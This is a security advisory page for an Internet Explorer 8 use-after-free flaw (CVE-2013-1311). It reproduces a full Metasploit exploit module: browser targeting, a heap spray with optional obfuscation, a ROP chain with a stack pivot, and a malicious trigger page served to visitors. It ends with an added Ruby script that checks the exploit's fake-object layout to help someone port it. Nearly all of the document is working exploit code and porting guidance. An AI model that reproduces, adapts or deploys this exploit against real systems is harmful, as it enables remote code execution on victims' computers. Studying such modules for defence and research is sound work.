Microsoft Internet Explorer textNode Use-After-Free

Microsoft Internet Explorer CVE-2013-1311 Use-After-Free Remote Code Execution Vulnerability

Microsoft Internet Explorer is prone to a remote code-execution vulnerability.

Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.

Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions.

Internet Explorer 8 is vulnerable.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-037 Microsoft Internet Explorer textNode Use-After-Free",
      'Description'    => %q{
        This module exploits a use-after-free vulnerability in Microsoft Internet Explorer
        where a DOM textNode pointer becomes corrupted after style computation. This pointer
        is then overwritten when the innerHTML property on the parent object is set.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1311' ],
          [ 'MSB', 'MS13-037' ],
          [ 'URL', 'http://security-assessment.com/files/documents/advisory/ms13_037_ie_textnode_uaf.pdf' ]
        ],
      'Payload'        =>
        {
          'BadChars'       => "\x00",
          'Space'          => 812,
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment: add esp, -3500
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "June 6 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    # If the target was already chosen by the user, just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    # os_name stays nil for any Windows version this module has no target for
    os_name = nil
    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end

    targets.each do |t|
      # Guard on os_name rather than nt so include?(nil) is never called
      if (!ie.empty? and t.name.include?(ie_name)) and (os_name and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

    js = %Q|

    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    var overflow = nops.substring(0, 10);

    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # ROP chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")

      stack_pivot = [
        0x77c1cafb, # POP EBP # RETN [msvcrt.dll]
        0x41414141, # Junk
        0x781a04cb  # POP ECX # PUSH ESP # RETN [urlmon.dll]
      ].pack("V*")

      # Set up required heap layout
      junk      = "#{Rex::Text.rand_text_alpha(4)}"
      null      = "\x00"*4
      valid_ptr = [0x0c0c0c0c].pack("V*")
      offset    = [0x0c0c0c6c].pack("V*")
      heap_foo  = junk*5 +
                  valid_ptr*2 +
                  junk +
                  offset +
                  junk*4 +
                  valid_ptr +
                  junk*6 +
                  valid_ptr +
                  null +
                  junk*2

      rop_payload = heap_foo << generate_rop_payload('msvcrt', "", {'pivot'=>stack_pivot, 'target'=>'xp'})
      rop_payload << code
    end

    return rop_payload
  end

  def get_exploit(my_target, cli)
    p  = get_payload(my_target, cli)
    js = heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    function exploit() {
      var obj = document.createElement('s')
      obj.innerHTML = "??"
      document.body.appendChild(obj)

      document.styleSheets[0].cssText = "body:first-line{color:blue}"
      CollectGarbage()

      setTimeout(function(){
        for (i=0;i<1000;i++){
          obj.innerHTML = "\\u0c2c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c\\u0c0c";
        }
      }, 500)
    }
    </script>
    <style>
    </style>
    </head>
    <body onload='setTimeout("exploit()", 2000)'>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = get_exploit(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status "Sending HTML..."
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

Source: http://www.securityfocus.com/bid/59752/discuss
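The part of the module that is easiest to get wrong when porting it is the fake object it calls heap_foo: a 0x60-byte block whose self-pointers all read 0x0c0c0c0c and whose dword at +0x20 reads 0x0c0c0c6c, followed directly by the mona-generated pivot and ROP chain. The script below is an added example, not code from the module or from the original post. It rebuilds that layout with the random junk replaced by a fixed "AAAA" so the result is reproducible, lists every dword with its offset, and checks the one relation the hard-coded constants imply: that the +0x20 pointer is exactly 0x0c0c0c0c plus the size of the fake object, i.e. the address of the first pivot gadget when the object itself starts at 0x0c0c0c0c. That placement is an inference from the constants, not something the post states, and the example does not model the heap chunk or BSTR headers that the spray's 'Offset' value (0x5f4 UTF-16 characters, 0xbe8 bytes into each 0x1000-byte period) has to absorb; it only computes the two page offsets so the 0x24-byte gap between them is visible.

```ruby
# Added example (not part of the Metasploit module): rebuild the heap_foo fake
# object and check that its hard-coded pointers agree with each other.
#
# Assumption (inferred from the constants, not stated on the page): the spray
# places the fake object so that its first byte is at 0x0c0c0c0c, and the ROP
# chain is what immediately follows heap_foo in rop_payload.

SPRAY_ADDR = 0x0c0c0c0c   # value of valid_ptr in the module
CHAIN_PTR  = 0x0c0c0c6c   # value of 'offset' in the module

# Same layout as heap_foo in get_payload; junk is fixed instead of random.
def build_heap_foo(junk = "AAAA")
  null      = "\x00" * 4
  valid_ptr = [SPRAY_ADDR].pack("V")
  offset    = [CHAIN_PTR].pack("V")
  junk * 5 + valid_ptr * 2 + junk + offset + junk * 4 +
    valid_ptr + junk * 6 + valid_ptr + null + junk * 2
end

# Dword-by-dword view of the object as [byte_offset, value] pairs.
def layout(obj)
  obj.unpack("V*").each_with_index.map { |v, i| [i * 4, v] }
end

# Byte offsets of every dword that points back into the 0x0c0c0c0c spray.
def spray_pointer_slots(obj)
  layout(obj).select { |_, v| (v >> 24) == 0x0c }.map(&:first)
end

# Address of the first ROP gadget when the fake object sits at base and the
# chain is appended directly after it, as rop_payload does.
def chain_start(obj, base = SPRAY_ADDR)
  base + obj.bytesize
end

# True when the dword at +0x20 (the module's 'offset') points at the start of
# the chain, i.e. at the first stack-pivot gadget (POP EBP # RETN).
def offset_points_at_chain?(obj, base = SPRAY_ADDR)
  layout(obj).any? { |off, v| off == 0x20 && v == chain_start(obj, base) }
end

# Byte offset of the payload inside each 0x1000-byte spray period: the module
# prepends 'Offset' UTF-16 characters of 0x0c0c filler, so twice that value.
def payload_page_offset(char_offset = 0x5f4)
  char_offset * 2
end

# Offset of the spray address inside its 4 KiB page.
def spray_addr_page_offset(addr = SPRAY_ADDR)
  addr & 0xfff
end

if __FILE__ == $0
  foo = build_heap_foo
  puts "fake object size: 0x%x bytes" % foo.bytesize
  layout(foo).each { |off, v| puts "  +0x%02x: 0x%08x" % [off, v] }
  puts "spray pointers at: " + spray_pointer_slots(foo).map { |o| "+0x%x" % o }.join(", ")
  puts "chain starts at:   0x%08x" % chain_start(foo)
  puts "offset dword ok:   #{offset_points_at_chain?(foo)}"
  puts "payload at +0x%x in each 0x1000-byte period; 0x0c0c0c0c is at +0x%x in its page" %
    [payload_page_offset, spray_addr_page_offset]
end
```

Running it prints the five pointer slots (+0x14, +0x18, +0x20, +0x34, +0x50), the null dword at +0x54, and confirms that 0x0c0c0c0c + 0x60 is 0x0c0c0c6c; if a port changes the size of the fake object, the +0x20 pointer has to move with it or the pivot is never reached.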
